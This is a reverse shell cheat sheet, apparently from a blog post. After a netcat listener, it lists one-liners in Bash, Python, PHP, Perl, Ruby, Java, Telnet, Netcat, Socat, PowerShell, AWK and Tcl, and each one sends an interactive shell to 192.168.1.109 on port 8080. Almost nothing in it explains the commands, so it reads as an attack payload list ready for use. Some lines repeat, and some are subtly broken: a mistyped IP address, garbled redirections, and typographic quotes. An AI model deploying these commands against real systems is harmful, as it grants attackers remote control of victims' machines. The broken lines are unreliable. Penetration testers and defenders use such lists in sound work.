Listener:
nc -l -v -p 8080
Bash
exec 5<>/dev/tcp/192.168.1.109/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/192.168.1.109/8080 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/192.168.1.109/8080 0>&1
bash -i >& /dev/tcp/192.168.1.109//8080 0>&1
TCLsh
echo ‘set s [socket 192.168.1.109 8080];while 42 { puts -nonewline $s «shell>»;flush $s;gets $s c;set e «exec $c»;if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;’ | tclsh
Python
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((«192.168.1.109»,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([«/bin/sh»,»-i»]);’
PHP
php -r ‘$sock=fsockopen(«192.168.1.109»,8080);exec(«/bin/sh -i <&3 >&3 2>&3»);’
php -r ‘$sock=fsockopen(«192.168.1.109»,8080);exec(«/bin/sh -i <&3 >&3 2>&3»);’
php -r ‘$s=fsockopen(«192.168.1.109»,8080);shell_exec(«/bin/sh -i <&3 >&3 2>&3»);’
php -r ‘$s=fsockopen(«192.168.1.109»,8080);`/bin/sh -i <&3 >&3 2>&3`;’
php -r ‘$s=fsockopen(«192.168.1.109»,8080);system(«/bin/sh -i <&3 >&3 2>&3»);’
php -r ‘$s=fsockopen(«192.168.1.109»,8080);popen(«/bin/sh -i <&3 >&3 2>&3», «r»);’
Perl
perl -e ‘use Socket;$i=»192.168.1.109″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(«tcp»));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,»>&S»);open(STDOUT,»>&S»);open(STDERR,»>&S»);exec(«/bin/sh -i»);};’
perl -e ‘use Socket;$i=»192.168.1.109″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(«tcp»));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,»>&S»);open(STDOUT,»>&S»);open(STDERR,»>&S»);exec(«/bin/sh -i»);};’
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”192.168.1.109:8080″);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’
Ruby
ruby -rsocket -e’f=TCPSocket.open(«192.168.1.109»,8080).to_i;exec sprintf(«/bin/sh -i <&%d >&%d 2>&%d»,f,f,f)’
ruby -rsocket -e’f=TCPSocket.open(«192.168.1.109»,8080).to_i;exec sprintf(«/bin/sh -i <&%d >&%d 2>&%d»,f,f,f)’
ruby -rsocket -e ‘exit if fork;c=TCPSocket.new(«192.168.1.109″,»8080″);while(cmd=c.gets);IO.popen(cmd,»r»){|io|c.print io.read}end’
Java
r = Runtime.getRuntime()
p = r.exec([«/bin/bash»,»-c»,»exec 5<>/dev/tcp/192.168.1.109/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done»] as String[])
p.waitFor()
Telnel:
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.109 8080 0/tmp/p
rm -f x; mknod x p && telnet 192.168.1.109 8080> 0<x | /bin/bash 1>x
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 192.168.1.109 8080 > f
telnet 192.168.1.109 8080 | /bin/bash | telnet 192.168.1.109
Netcat
nc -e /bin/sh 192.168.1.109 8080
/bin/sh | nc 192.168.1.109 8080
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.109 8080 0/tmp/p
Socat
socat tcp-connect:192.138.1.109:8080 exec:»bash -li»,pty,stderr,setsid,sigint,sane
Powershell
powershell.exe -w hidden -c ‘$client = New-Object System.Net.Sockets.TCPClient(«192.168.1.109»,8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + «PS » + (pwd).Path + «> «;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()’
AWK
awk ‘BEGIN {s = «/inet/tcp/0/192.168.1.109/8080»; while(42) { do{ printf «shell>» |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != «exit») close(s); }}’ /dev/null
Una respuesta a “Reverse Shell Cheat Sheet”